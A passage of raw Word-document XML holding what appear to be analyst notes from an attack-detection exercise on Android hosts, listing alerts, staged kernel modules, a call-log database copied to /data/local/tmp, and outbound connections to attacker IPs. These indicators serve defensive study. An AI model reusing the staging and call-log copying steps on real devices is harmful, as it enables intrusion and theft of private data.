          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>subx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B228FE" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>4:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB80E0" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEBDABA" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>on CS-1, there are lots of `toybox`forked from `com.bloketech.lockwatch`. Files accessed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25330B1B" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/msm_g711tlaw.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323DD61D" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/a64.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094BDF12" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/tc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB9626C" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69019B81" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/external.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB78EA2" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/internal.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7D6D7" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/data/com.android.providers.contacts/databases/calllog.db </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A299E7E" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>/data/local/tmp/calllog.db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B21DF2" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>4:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61337C0B" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1201A3" w14:textId="2F418C75" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="18"/>
          <w14:shadow w14:blurRad="50800" w14:dist="38100" w14:dir="2700000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="tl">
            <w14:srgbClr w14:val="000000">
              <w14:alpha w14:val="60000"/>
            </w14:srgbClr>
          </w14:shadow>
        </w:rPr>
        <w:t>Get another set of alerts on CS-1 that a suspicious process `/data/local/tmp/tester` is started by `/system/bin/app_process64`, connecting to `128.55.12.233:80`, and forked another `/system/bin/toybox`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F959D52" w14:textId="2850AC29" w:rsidR="00FE6381" w:rsidRPr="000112FB" w:rsidRDefault="00FE6381" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E97424" w14:textId="744A70BD" w:rsidR="00821808" w:rsidRDefault="00821808" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Also on 5/17 real time </w:t>
      </w:r>
      <w:r w:rsidR="007E1289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>attack events</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> were </w:t>
      </w:r>
      <w:r w:rsidR="007E1289">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>reported</w:t>
      </w:r>
      <w:r w:rsidRPr="000112FB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43749429" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="000112FB" w:rsidRDefault="007508CA" w:rsidP="005A0BE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C49ADE4" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mdnhossain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A104B5" w14:textId="77777777" w:rsidR="00821808" w:rsidRPr="007508CA" w:rsidRDefault="00821808" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E4429C" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0520384A" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>On Clearscope-2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401C2FD9" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Alarm: UntrustedExec: 000: Object 244181 (/data/data/de.belu.appstarter/busybox) Subject 12846 pid=15153 _init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14645DD1" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The resulting process then writes to IP 77.138.117.150:80 and a file named /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FE76D" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E2BE6" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB6CE3B" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f9122a1c02c23219ae943ca2387059ba|1557949897885000000|0.7500|1.0000|ta1-clearscope-2-e5-official-1|860178f80fe966cc8ee2f6bbd1a59dab||networkconnect:/data/data/de.belu.appstarter/busybox:77.138.117.150!80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F125F55" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007508CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:color w:val="313131"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7a59d2742703c1619edacd49ea9c9309|1557949897891000000|0.7500|1.0000|ta1-clearscope-2-e5-official-1|860178f80fe966cc8ee2f6bbd1a59dab||exec:/data/data/de.belu.appstarter/busybox:/system/bin/toybox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE03F07" w14:textId="77777777" w:rsidR="007508CA" w:rsidRPr="007508CA" w:rsidRDefault="007508CA" w:rsidP="007508CA">
      <w:pPr>
